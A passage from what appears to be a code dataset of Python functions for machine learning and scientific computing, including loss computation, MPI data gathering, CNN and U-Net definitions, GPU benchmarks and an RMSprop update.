torch.sum(subj_start_loss.mul(mask.float()))/torch.sum(mask.float())\n \n subj_end_loss = self.obj_criterion(subj_end_logits.view(-1, self.opt['num_subj_type']+1), subj_end_type.view(-1).squeeze()).view_as(mask)\n subj_end_loss = torch.sum(subj_end_loss.mul(mask.float()))/torch.sum(mask.float())\n \n obj_start_loss = self.obj_criterion(obj_start_logits.view(-1, self.opt['num_class']+1), obj_start_relation.view(-1).squeeze()).view_as(mask)\n obj_start_loss = torch.sum(obj_start_loss.mul(mask.float()))/torch.sum(mask.float())\n \n obj_end_loss = self.obj_criterion(obj_end_logits.view(-1, self.opt['num_class']+1), obj_end_relation.view(-1).squeeze()).view_as(mask)\n obj_end_loss = torch.sum(obj_end_loss.mul(mask.float()))/torch.sum(mask.float())\n \n loss = self.opt['subj_loss_weight']*(subj_start_loss + subj_end_loss) + (obj_start_loss + obj_end_loss)\n \n # backward\n loss.backward()\n # torch.nn.utils.clip_grad_norm(self.model.parameters(), self.opt['max_grad_norm'])\n self.optimizer.step()\n loss_val = loss.data.item()\n return loss_val", "def gather_ps(rank, size, comm, k_allmodels, P21_allmodels, PHII_allmodels,\n first_snap_allmodels, last_snap_allmodels):\n\n def generate_tag(rank):\n tag = int(rank*100)\n\n return tag\n\n # Rank 0 will gather the wavenumber bins/power spectra from all other\n # ranks. \n if rank == 0:\n k_master = []\n P21_master = []\n PHII_master = []\n\n # Go through each model. \n for model_number in range(len(k_allmodels)):\n\n k_master.append([])\n P21_master.append([])\n PHII_master.append([])\n\n model_k = k_allmodels[model_number]\n model_P21 = P21_allmodels[model_number]\n model_PHII = PHII_allmodels[model_number]\n\n num_snaps = last_snap_allmodels[model_number] - \\\n first_snap_allmodels[model_number]\n rank_count = 0\n my_count = 0\n\n # Then go through each snapshot.\n # In the main data loop (``generate_data()``) the snapshots are\n # scatter sequentially. Hence when we gather, we get snap0 from\n # rank 0, snap1 from rank 1 etc. So we increase rank_count for each\n # snapshot and then reset it when we reach `size`.\n for snap_idx in range(num_snaps):\n\n if rank_count == 0:\n this_k = model_k[my_count] \n this_P21 = model_P21[my_count] \n this_PHII = model_PHII[my_count] \n my_count += 1\n else:\n # Each rank will use a unique tag.\n tag = generate_tag(rank_count) \n\n # Then the tag is offset for each data array. \n this_k = comm.recv(source = rank_count,\n tag = tag)\n this_P21 = comm.recv(source = rank_count,\n tag = tag+1)\n this_PHII = comm.recv(source = rank_count,\n tag = tag+2)\n\n # Now we have the data, append it to the master.\n k_master[model_number].append(this_k)\n P21_master[model_number].append(this_P21)\n PHII_master[model_number].append(this_PHII)\n\n rank_count += 1\n if rank_count == size:\n rank_count = 0\n\n # Snapshot Loop.\n # Model Loop.\n\n return k_master, P21_master, PHII_master\n\n else:\n\n # For all other ranks, go through the power spectra it calculated and\n # send it back to the root rank.\n for model_number in range(len(k_allmodels)):\n for idx in range(len(P21_allmodels[model_number])):\n\n tag = generate_tag(rank) \n\n k_this_idx = k_allmodels[model_number][idx]\n P21_this_idx = P21_allmodels[model_number][idx]\n PHII_this_idx = PHII_allmodels[model_number][idx]\n\n comm.send(k_this_idx, dest = 0, tag = tag)\n comm.send(P21_this_idx, dest = 0, tag = tag+1)\n comm.send(PHII_this_idx, dest = 0, tag = tag+2)\n\n # Non-zero ranks return junk.\n return None, None, None", "def __init__(self,\n num_class=2,\n layer_nums=(3, 5, 5),\n layer_strides=(2, 2, 2),\n num_filters=(128, 128, 256),\n upsample_strides=(1, 2, 4),\n num_upsample_filters=(256, 256, 256),\n num_input_features=128,\n num_anchor_per_loc=2,\n use_groupnorm=False,\n num_groups=32,\n box_code_size=7,\n num_direction_bins=2):\n super(RPN, self).__init__()\n self._num_anchor_per_loc = num_anchor_per_loc\n self._box_code_size=box_code_size\n self._num_class=num_class\n self._num_direction_bins=num_direction_bins\n assert len(layer_nums) == 3\n assert len(layer_strides) == len(layer_nums)\n assert len(num_filters) == len(layer_nums)\n assert len(upsample_strides) == len(layer_nums)\n assert len(num_upsample_filters) == len(layer_nums)\n upsample_strides=[int(i) for i in upsample_strides]\n\n factors = []\n for i in range(len(layer_nums)):\n assert int(np.prod(\n layer_strides[:i + 1])) % upsample_strides[i] == 0\n factors.append(\n np.prod(layer_strides[:i + 1]) // upsample_strides[i])\n assert all([x == factors[0] for x in factors])\n\n # note that when stride > 1, conv2d with same padding isn't\n # equal to pad-conv2d. we should use pad-conv2d.\n block2_input_filters = num_filters[0]\n if use_groupnorm:\n BatchNorm2d = change_default_args(\n num_groups=num_groups, eps=1e-3)(GroupNorm)\n else:\n BatchNorm2d = change_default_args(\n eps=1e-3, momentum=0.01)(nn.BatchNorm2d)\n\n self.block1 = Sequential(\n nn.ZeroPad2d(1),\n nn.Conv2d(num_input_features, num_filters[0], 3,\n stride=layer_strides[0],bias=False),\n BatchNorm2d(num_filters[0]),\n nn.ReLU(),)\n for i in range(layer_nums[0]):\n self.block1.add(\n nn.Conv2d(num_filters[0], num_filters[0], 3,padding=1,bias=False))\n self.block1.add(BatchNorm2d(num_filters[0]))\n self.block1.add(nn.ReLU())\n self.deconv1 = Sequential(\n nn.ConvTranspose2d(num_filters[0],num_upsample_filters[0],\n upsample_strides[0],stride=upsample_strides[0],bias=False),\n BatchNorm2d(num_upsample_filters[0]),\n nn.ReLU(),)\n self.block2 = Sequential(\n nn.ZeroPad2d(1),\n nn.Conv2d(block2_input_filters,num_filters[1],3,\n stride=layer_strides[1],bias=False),\n BatchNorm2d(num_filters[1]),\n nn.ReLU(),)\n for i in range(layer_nums[1]):\n self.block2.add(\n nn.Conv2d(num_filters[1], num_filters[1], 3, padding=1,bias=False))\n self.block2.add(BatchNorm2d(num_filters[1]))\n self.block2.add(nn.ReLU())\n self.deconv2 = Sequential(\n nn.ConvTranspose2d(num_filters[1],num_upsample_filters[1],\n upsample_strides[1],stride=upsample_strides[1],bias=False),\n BatchNorm2d(num_upsample_filters[1]),\n nn.ReLU(),)\n self.block3 = Sequential(\n nn.ZeroPad2d(1),\n nn.Conv2d(num_filters[1], num_filters[2], 3, stride=layer_strides[2],bias=False),\n BatchNorm2d(num_filters[2]),\n nn.ReLU(),)\n for i in range(layer_nums[2]):\n self.block3.add(nn.Conv2d(num_filters[2], num_filters[2], 3, padding=1,bias=False))\n self.block3.add(BatchNorm2d(num_filters[2]))\n self.block3.add(nn.ReLU())\n self.deconv3 = Sequential(\n nn.ConvTranspose2d(\n num_filters[2],num_upsample_filters[2],\n upsample_strides[2],stride=upsample_strides[2],bias=False),\n BatchNorm2d(num_upsample_filters[2]),\n nn.ReLU(),)\n\n num_cls = num_anchor_per_loc * num_class\n self.conv_cls = nn.Conv2d(sum(num_upsample_filters), num_cls, 1)\n self.conv_box = nn.Conv2d(sum(num_upsample_filters), num_anchor_per_loc * box_code_size, 1)\n self.conv_dir_cls = nn.Conv2d(sum(num_upsample_filters),num_anchor_per_loc * num_direction_bins, 1)", "def compute_BP(self, betas, bias, type, idx_to_keep = None):\n\n if idx_to_keep is not None:\n betas[self._all_but(len(betas),idx_to_keep)] = 0.\n\n if type == 'rates':\n y1 = self.responses_all[:,self.stimuli == -1]\n y2 = self.responses_all[:,self.stimuli == +1]\n if type == 'regressors':\n y1 = self.regressors[:,self.stimuli == -1]\n y2 = self.regressors[:,self.stimuli == +1]\n if type == 'shuffled':\n y_sh = self._shuffle_regressors()\n y1 = y_sh[:,self.stimuli == -1]\n y2 = y_sh[:,self.stimuli == +1]\n\n x1 = np.dot(betas, y1) + bias\n x2 = np.dot(betas, y2) + bias\n p_c_1 = 1 - expit(x1) # = p(c=-1|s=-1,x)\n p_c_2 = expit(x2)\n BP = np.sum(p_c_1) + np.sum(p_c_2)\n BP = BP/float(self.ntrials)\n return BP", "def run_simple_CNN():\n [train_set, test_set, train_sampler, val_sampler, test_sampler] = pre_processing_and_samples()\n CNN = SimpleCNN()\n # Using GPU for training\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print(device)\n if torch.cuda.is_available():\n print(\"cuda is available\")\n CNN.to(device)\n\n # Multiple GPUs\n if torch.cuda.device_count() > 1:\n CNN = nn.DataParallel(CNN)\n\n num_epochs = 100\n\n train_loss_hist, train_acc_hist, val_loss_hist, val_acc_hist = \\\n trainCNN(net=CNN, device=device, batch_size=64, n_epochs=num_epochs, learning_rate=0.001,\n train_set=train_set, test_set=test_set, train_sampler=train_sampler, val_sampler=val_sampler)\n test(net=CNN, device=device, test_set=test_set, test_sampler=test_sampler)\n\n fig, (ax1, ax2) = plt.subplots(2)\n\n ax1.set_title(\"Loss vs. Number of Training Epochs\")\n ax1.set(xlabel=\"Training Epoch\", ylabel=\"Loss\")\n ax1.plot(range(1, len(train_loss_hist) + 1), train_loss_hist, label=\"Training\")\n ax1.plot(range(1, len(val_loss_hist) + 1), val_loss_hist, label=\"Validation\")\n print(np.concatenate((train_loss_hist, val_loss_hist)))\n print(np.amax(np.concatenate((train_loss_hist, val_loss_hist))))\n ax1.set_ylim(\n (0, 1.25 * np.amax(np.concatenate((train_loss_hist, val_loss_hist), axis=0, out=None)).detach().cpu()))\n ax1.set_xticks(np.arange(1, num_epochs + 1, 1.0))\n ax1.legend()\n\n ax2.set_title(\"Accuracy vs. Number of Training Epochs\")\n ax2.set(xlabel=\"Training Epoch\", ylabel=\"Accuracy\")\n ax2.plot(range(1, num_epochs + 1), train_acc_hist, label=\"Training\")\n ax2.plot(range(1, num_epochs + 1), val_acc_hist, label=\"Validation\")\n ax2.set_ylim(0, 100) # Sets y bounds\n ax2.set_xticks(np.arange(1, num_epochs + 1, 1.0))\n ax2.legend()\n\n plt.tight_layout() # Call after plotting all subplots\n plt.savefig('basic_cifar_10.png')", "def u_net_bn(x, is_train=False, reuse=False, pad='SAME', n_out=3):\n _, nx, ny, nz = x.shape\n print(\" * Input: size of image: (%d %d %d)\" % (nx, ny, nz))\n w_init = tf.truncated_normal_initializer(stddev=0.01)\n b_init = tf.constant_initializer(value=0.0)\n decay = 0.9\n gamma_init=tf.random_normal_initializer(1., 0.02)\n lrelu = lambda x: tf.nn.leaky_relu(x, 0.2)\n with tf.variable_scope(\"u_net_bn\", reuse=reuse):\n inputs = InputLayer(x, name='in')\n\n conv1 = Conv2d(inputs, 64, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=b_init, name='conv1')\n conv2 = Conv2d(conv1, 128, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv2')\n conv2 = BatchNormLayer(conv2, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn2')\n\n conv3 = Conv2d(conv2, 256, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv3')\n conv3 = BatchNormLayer(conv3, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn3')\n\n conv4 = Conv2d(conv3, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv4')\n conv4 = BatchNormLayer(conv4, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn4')\n\n conv5 = Conv2d(conv4, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv5')\n conv5 = BatchNormLayer(conv5, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn5')\n\n conv6 = Conv2d(conv5, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv6')\n conv6 = BatchNormLayer(conv6, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn6')\n\n conv7 = Conv2d(conv6, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv7')\n conv7 = BatchNormLayer(conv7, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn7')\n\n conv8 = Conv2d(conv7, 512, (4, 4), (2, 2), act=lrelu, padding=pad, W_init=w_init, b_init=b_init, name='conv8')\n print(\" * After conv: %s\" % conv8.outputs)\n\n up7 = DeConv2d(conv8, 512, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv7')\n up7 = BatchNormLayer(up7, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn7')\n\n # print(up6.outputs)\n up6 = ConcatLayer([up7, conv7], concat_dim=3, name='concat6')\n up6 = DeConv2d(up6, 1024, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv6')\n up6 = BatchNormLayer(up6, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn6')\n # print(up6.outputs)\n\n up5 = ConcatLayer([up6, conv6], concat_dim=3, name='concat5')\n up5 = DeConv2d(up5, 1024, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv5')\n up5 = BatchNormLayer(up5, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn5')\n # print(up5.outputs)\n\n up4 = ConcatLayer([up5, conv5] ,concat_dim=3, name='concat4')\n up4 = DeConv2d(up4, 1024, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv4')\n up4 = BatchNormLayer(up4, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn4')\n\n up3 = ConcatLayer([up4, conv4] ,concat_dim=3, name='concat3')\n up3 = DeConv2d(up3, 256, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv3')\n up3 = BatchNormLayer(up3, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn3')\n\n up2 = ConcatLayer([up3, conv3] ,concat_dim=3, name='concat2')\n up2 = DeConv2d(up2, 128, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv2')\n up2 = BatchNormLayer(up2, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn2')\n\n up1 = ConcatLayer([up2, conv2] ,concat_dim=3, name='concat1')\n up1 = DeConv2d(up1, 64, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv1')\n up1 = BatchNormLayer(up1, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn1')\n\n up0 = ConcatLayer([up1, conv1] ,concat_dim=3, name='concat0')\n up0 = DeConv2d(up0, 64, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv0')\n up0 = BatchNormLayer(up0, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn0')\n # print(up0.outputs)\n\n out = Conv2d(up0, n_out, (1, 1), act=tf.nn.sigmoid, name='out')\n\n print(\" * Output: %s\" % out.outputs)\n\n return out", "def speed():\r\n\r\n algo = ['logistic_sgd', 'logistic_cg', 'mlp', 'convolutional_mlp',\r\n 'dA', 'SdA', 'DBN', 'rbm', 'rnnrbm']\r\n to_exec = [True] * len(algo)\r\n# to_exec = [False] * len(algo)\r\n# to_exec[-1] = True\r\n do_float64 = True\r\n do_float32 = True\r\n do_gpu = True\r\n\r\n algo_executed = [s for idx, s in enumerate(algo) if to_exec[idx]]\r\n #Timming expected are from the buildbot that have an i7-920 @\r\n # 2.67GHz with hyperthread enabled for the cpu, 12G of ram. An GeForce GTX\r\n # 285 for the GPU. OS=Fedora 14, gcc=4.5.1, python/BLAS from EPD\r\n # 7.1-2 (python 2.7.2, mkl unknow). BLAS with only 1 thread.\r\n\r\n expected_times_64 = numpy.asarray([10.0, 22.5, 76.1, 73.7, 116.4,\r\n 346.9, 381.9, 558.1, 186.3])\r\n expected_times_32 = numpy.asarray([11.6, 29.6, 42.5, 66.5, 71,\r\n 191.2, 226.8, 432.8, 176.2])\r\n\r\n # Number with just 1 decimal are new value that are faster with\r\n # the Theano version 0.5rc2 Other number are older. They are not\r\n # updated, as we where faster in the past!\r\n # TODO: find why and fix this!\r\n\r\n# Here is the value for the buildbot on February 3th 2012.\r\n# sgd, cg mlp conv da\r\n# sda dbn rbm\r\n# gpu times[3.72957802, 9.94316864, 29.1772666, 9.13857198, 25.91144657,\r\n# 18.30802011, 53.38651466, 285.41386175]\r\n# expected [3.076634879, 7.555234910, 18.99226785, 9.58915591, 24.130070450,\r\n# 24.77524018, 92.66246653, 322.340329170]\r\n# sgd, cg mlp conv da\r\n# sda dbn rbm\r\n#expected/get [0.82492841, 0.75984178, 0.65092691, 1.04930573, 0.93125138\r\n# 1.35324519 1.7356905 1.12937868]\r\n expected_times_gpu = numpy.asarray([3.07663488, 7.55523491, 18.99226785,\r\n 9.6, 24.13007045,\r\n 20.4, 56, 302.6, 315.4])\r\n expected_times_64 = [s for idx, s in enumerate(expected_times_64)\r\n if to_exec[idx]]\r\n expected_times_32 = [s for idx, s in enumerate(expected_times_32)\r\n if to_exec[idx]]\r\n expected_times_gpu = [s for idx, s in enumerate(expected_times_gpu)\r\n if to_exec[idx]]\r\n\r\n def time_test(m, l, idx, f, **kwargs):\r\n if not to_exec[idx]:\r\n return\r\n print algo[idx]\r\n ts = m.call_time\r\n try:\r\n f(**kwargs)\r\n except Exception, e:\r\n print >> sys.stderr, 'test', algo[idx], 'FAILED', e\r\n l.append(numpy.nan)\r\n return\r\n te = m.call_time\r\n l.append(te - ts)\r\n\r\n def do_tests():\r\n m = theano.compile.mode.get_default_mode()\r\n l = []\r\n time_test(m, l, 0, logistic_sgd.sgd_optimization_mnist, n_epochs=30)\r\n time_test(m, l, 1, logistic_cg.cg_optimization_mnist, n_epochs=30)\r\n time_test(m, l, 2, mlp.test_mlp, n_epochs=5)\r\n time_test(m, l, 3, convolutional_mlp.evaluate_lenet5, n_epochs=5,\r\n nkerns=[5, 5])\r\n time_test(m, l, 4, dA.test_dA, training_epochs=2,\r\n output_folder='tmp_dA_plots')\r\n time_test(m, l, 5, SdA.test_SdA, pretraining_epochs=1,\r\n training_epochs=2, batch_size=300)\r\n time_test(m, l, 6, DBN.test_DBN, pretraining_epochs=1,\r\n training_epochs=2, batch_size=300)\r\n time_test(m, l, 7, rbm.test_rbm, training_epochs=1, batch_size=300,\r\n n_chains=1, n_samples=1, output_folder='tmp_rbm_plots')\r\n time_test(m, l, 8, rnnrbm.test_rnnrbm, num_epochs=1)\r\n return numpy.asarray(l)\r\n\r\n #test in float64 in FAST_RUN mode on the cpu\r\n import theano\r\n if do_float64:\r\n theano.config.floatX = 'float64'\r\n theano.config.mode = 'FAST_RUN'\r\n float64_times = do_tests()\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'float64 times', float64_times\r\n print >> sys.stderr, 'float64 expected', expected_times_64\r\n print >> sys.stderr, 'float64 % expected/get', (\r\n expected_times_64 / float64_times)\r\n\r\n #test in float32 in FAST_RUN mode on the cpu\r\n theano.config.floatX = 'float32'\r\n if do_float32:\r\n float32_times = do_tests()\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'float32 times', float32_times\r\n print >> sys.stderr, 'float32 expected', expected_times_32\r\n print >> sys.stderr, 'float32 % expected/get', (\r\n expected_times_32 / float32_times)\r\n\r\n if do_float64:\r\n print >> sys.stderr, 'float64/float32', (\r\n float64_times / float32_times)\r\n print >> sys.stderr\r\n print >> sys.stderr, 'Duplicate the timing to have everything in one place'\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'float64 times', float64_times\r\n print >> sys.stderr, 'float64 expected', expected_times_64\r\n print >> sys.stderr, 'float64 % expected/get', (\r\n expected_times_64 / float64_times)\r\n print >> sys.stderr, 'float32 times', float32_times\r\n print >> sys.stderr, 'float32 expected', expected_times_32\r\n print >> sys.stderr, 'float32 % expected/get', (\r\n expected_times_32 / float32_times)\r\n\r\n print >> sys.stderr, 'float64/float32', (\r\n float64_times / float32_times)\r\n print >> sys.stderr, 'expected float64/float32', (\r\n expected_times_64 / float32_times)\r\n\r\n #test in float32 in FAST_RUN mode on the gpu\r\n import theano.sandbox.cuda\r\n if do_gpu:\r\n theano.sandbox.cuda.use('gpu')\r\n gpu_times = do_tests()\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'gpu times', gpu_times\r\n print >> sys.stderr, 'gpu expected', expected_times_gpu\r\n print >> sys.stderr, 'gpu % expected/get', (\r\n expected_times_gpu / gpu_times)\r\n\r\n if do_float64:\r\n print >> sys.stderr, 'float64/gpu', float64_times / gpu_times\r\n\r\n if (do_float64 + do_float32 + do_gpu) > 1:\r\n print >> sys.stderr\r\n print >> sys.stderr, 'Duplicate the timing to have everything in one place'\r\n print >> sys.stderr, algo_executed\r\n if do_float64:\r\n print >> sys.stderr, 'float64 times', float64_times\r\n print >> sys.stderr, 'float64 expected', expected_times_64\r\n print >> sys.stderr, 'float64 % expected/get', (\r\n expected_times_64 / float64_times)\r\n if do_float32:\r\n print >> sys.stderr, 'float32 times', float32_times\r\n print >> sys.stderr, 'float32 expected', expected_times_32\r\n print >> sys.stderr, 'float32 % expected/get', (\r\n expected_times_32 / float32_times)\r\n if do_gpu:\r\n print >> sys.stderr, 'gpu times', gpu_times\r\n print >> sys.stderr, 'gpu expected', expected_times_gpu\r\n print >> sys.stderr, 'gpu % expected/get', (\r\n expected_times_gpu / gpu_times)\r\n\r\n if do_float64 and do_float32:\r\n print >> sys.stderr, 'float64/float32', (\r\n float64_times / float32_times)\r\n print >> sys.stderr, 'expected float64/float32', (\r\n expected_times_64 / float32_times)\r\n if do_float64 and do_gpu:\r\n print >> sys.stderr, 'float64/gpu', float64_times / gpu_times\r\n print >> sys.stderr, 'expected float64/gpu', (\r\n expected_times_64 / gpu_times)\r\n if do_float32 and do_gpu:\r\n print >> sys.stderr, 'float32/gpu', float32_times / gpu_times\r\n print >> sys.stderr, 'expected float32/gpu', (\r\n expected_times_32 / gpu_times)\r\n\r\n def compare(x, y):\r\n ratio = x / y\r\n # If there is more then 5% difference between the expected\r\n # time and the real time, we consider this an error.\r\n return sum((ratio < 0.95) + (ratio > 1.05))\r\n\r\n if do_float64:\r\n err = compare(expected_times_64, float64_times)\r\n print >> sys.stderr, 'speed_failure_float64=' + str(err)\r\n if do_float32:\r\n err = compare(expected_times_32, float32_times)\r\n print >> sys.stderr, 'speed_failure_float32=' + str(err)\r\n if do_gpu:\r\n err = compare(expected_times_gpu, gpu_times)\r\n print >> sys.stderr, 'speed_failure_gpu=' + str(err)\r\n\r\n assert not numpy.isnan(gpu_times).any()", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(num_gpus=1)\n self._run_benchmark(params)", "def run_bootstrap_net_correlation_worker(run_parameters, spreadsheet_df, phenotype_df, network_mat,\n spreadsheet_genes_as_input, baseline_array, job_id):\n\n np.random.seed(job_id)\n\n restart_accumulator = np.zeros(network_mat.shape[0])\n gm_accumulator = np.ones(network_mat.shape[0])\n borda_count = np.zeros(network_mat.shape[0])\n\n phenotype_df = phenotype_df.iloc[[job_id], :]\n spreadsheet_df_trimmed, phenotype_df_trimmed, ret_msg = datacln.check_input_value_for_gene_prioritazion(\n spreadsheet_df, phenotype_df)\n\n sample_smooth = spreadsheet_df_trimmed.as_matrix()\n\n pearson_array = get_correlation(sample_smooth, phenotype_df_trimmed.values[0], run_parameters)\n n_bootstraps = run_parameters[\"number_of_bootstraps\"]\n for bootstrap_number in range(0, n_bootstraps):\n sample_random, sample_permutation = sample_a_matrix_pearson(\n sample_smooth, 1.0, run_parameters[\"cols_sampling_fraction\"])\n\n phenotype_response = phenotype_df_trimmed.values[0, None]\n phenotype_response = phenotype_response[0, sample_permutation]\n pc_array = get_correlation(sample_random, phenotype_response, run_parameters)\n\n pc_array[~np.in1d(spreadsheet_df_trimmed.index, spreadsheet_genes_as_input)] = 0.0\n pc_array = np.abs(trim_to_top_beta(pc_array, run_parameters[\"top_beta_of_sort\"]))\n restart_accumulator[pc_array != 0] += 1.0\n\n pc_array = pc_array / max(sum(pc_array), EPSILON_0)\n pc_array = kn.smooth_matrix_with_rwr(pc_array, network_mat, run_parameters)[0]\n pc_array = pc_array - baseline_array\n\n borda_count = sum_array_ranking_to_borda_count(borda_count, pc_array)\n gm_accumulator = (np.abs(pc_array) + EPSILON_0) * gm_accumulator\n\n restart_accumulator = restart_accumulator / n_bootstraps\n borda_count = borda_count / n_bootstraps\n # pcc_gm_array = gm_accumulator ** (1 / n_bootstraps)\n viz_score = (borda_count - min(borda_count)) / (max(borda_count) - min(borda_count))\n\n phenotype_name = phenotype_df_trimmed.index.values[0]\n gene_name_list = spreadsheet_df_trimmed.index\n gene_orig_list = spreadsheet_genes_as_input\n quantitative_score = borda_count\n generate_net_correlation_output(pearson_array, quantitative_score, viz_score, restart_accumulator,\n phenotype_name, gene_name_list, gene_orig_list, run_parameters)", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server')\n self._run_benchmark(params)", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server')\n self._run_benchmark(params)", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server')\n self._run_benchmark(params)", "def weight_update_rmsprop(self, network):\n epsilon = 10e-8\n gamma = self.gamma\n one_m_gamma = 1.0 - gamma\n\n if self.ms_b is None or self.ms_q is None:\n self.ms_b = []\n self.ms_q = []\n self.ms_rx_inp = []\n self.ms_ry_inp = []\n self.ms_rx_pos_out = []\n self.ms_ry_pos_out = []\n self.ms_rx_neg_out = []\n self.ms_ry_neg_out = []\n for l, layer in enumerate(network.layers):\n self.ms_b.append(np.zeros(layer.b.shape))\n self.ms_q.append(np.zeros(layer.q.shape))\n self.ms_rx_inp.append(np.zeros(layer.input_size))\n self.ms_ry_inp.append(np.zeros(layer.input_size))\n self.ms_rx_pos_out.append(np.zeros(layer.output_size))\n self.ms_ry_pos_out.append(np.zeros(layer.output_size))\n self.ms_rx_neg_out.append(np.zeros(layer.output_size))\n self.ms_ry_neg_out.append(np.zeros(layer.output_size))\n\n for l, layer in enumerate(network.layers):\n self.ms_b[l] = gamma * self.ms_b[l] + one_m_gamma * self.dc_db[l]**2\n self.ms_q[l] = gamma * self.ms_q[l] + one_m_gamma * self.dc_dq[l]**2\n\n self.ms_rx_inp[l] = gamma * self.ms_rx_inp[l] + one_m_gamma * self.dc_drx_inp[l]**2\n self.ms_ry_inp[l] = gamma * self.ms_ry_inp[l] + one_m_gamma * self.dc_dry_inp[l]**2\n\n self.ms_rx_pos_out[l] = gamma * self.ms_rx_pos_out[l] + one_m_gamma * self.dc_drx_pos_out[l]**2\n self.ms_ry_pos_out[l] = gamma * self.ms_ry_pos_out[l] + one_m_gamma * self.dc_dry_pos_out[l]**2\n self.ms_rx_neg_out[l] = gamma * self.ms_rx_neg_out[l] + one_m_gamma * self.dc_drx_neg_out[l]**2\n self.ms_ry_neg_out[l] = gamma * self.ms_ry_neg_out[l] + one_m_gamma * self.dc_dry_neg_out[l]**2\n\n layer.b += -self.alpha * self.dc_db[l] / np.sqrt(self.ms_b[l] + epsilon)\n layer.q += -self.alpha * self.dc_dq[l] / np.sqrt(self.ms_q[l] + epsilon)\n\n layer.rx_inp += -self.alpha * self.dc_drx_inp[l] / np.sqrt(self.ms_rx_inp[l] + epsilon)\n layer.ry_inp += -self.alpha * self.dc_dry_inp[l] / np.sqrt(self.ms_ry_inp[l] + epsilon)\n\n layer.rx_pos_out += -self.alpha * self.dc_drx_pos_out[l] / np.sqrt(self.ms_rx_pos_out[l] + epsilon)\n layer.ry_pos_out += -self.alpha * self.dc_dry_pos_out[l] / np.sqrt(self.ms_ry_pos_out[l] + epsilon)\n layer.rx_neg_out += -self.alpha * self.dc_drx_neg_out[l] / np.sqrt(self.ms_rx_neg_out[l] + epsilon)\n layer.ry_neg_out += -self.alpha * self.dc_dry_neg_out[l] / np.sqrt(self.ms_ry_neg_out[l] + epsilon)", "def benchmark_xla_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server', xla=True)\n self._run_benchmark(params)", "def benchmark_xla_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server', xla=True)\n self._run_benchmark(params)", "def benchmark_xla_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server', xla=True)\n self._run_benchmark(params)", "def evaluation(net, n_way, k_query, mdl_file, repnet, imgsz, batchsz):\n\t# we need to test 11788 - 8855 = 2933 images.\n\tdb = Cub('../CUB_200_2011_ZL/', n_way, k_query, train=False, episode_num= 1000//n_way//k_query, imgsz=imgsz)\n\tdb_loader = DataLoader(db, 1, shuffle=True, num_workers=1, pin_memory=True)\n\n\taccs = []\n\tfor batch in db_loader:\n\t\tx = Variable(batch[0]).cuda()\n\t\tx_label = Variable(batch[1]).cuda()\n\t\tatt = Variable(batch[2]).cuda()\n\t\tatt_label = Variable(batch[3]).cuda()\n\n\t\t# prepare for following procedure.\n\t\treal_batchsz = x.size(0)\n\t\tsetsz = x.size(1)\n\n\t\t# [b, setsz, c, h, w] => [b*setsz, c, h, w]\n\t\tx = x.view(real_batchsz * setsz, 3, imgsz, imgsz)\n\t\t# [small batch, c, h, w]\n\t\tx_chunks = torch.chunk(x, batchsz * n_way, dim=0)\n\t\tfeatures = []\n\t\tfor img in x_chunks:\n\t\t\t# [small batch, 512, 1, 1] => [small batch, 512]\n\t\t\tfeature = repnet(img).view(img.size(0), 512)\n\t\t\tfeatures.append(feature)\n\t\t# [b*setsz, 512] => [real batch, setsz, 512]\n\t\tx = torch.cat(features, dim=0).view(real_batchsz, setsz, 512)\n\t\t# detach gradient !!!\n\t\tx = 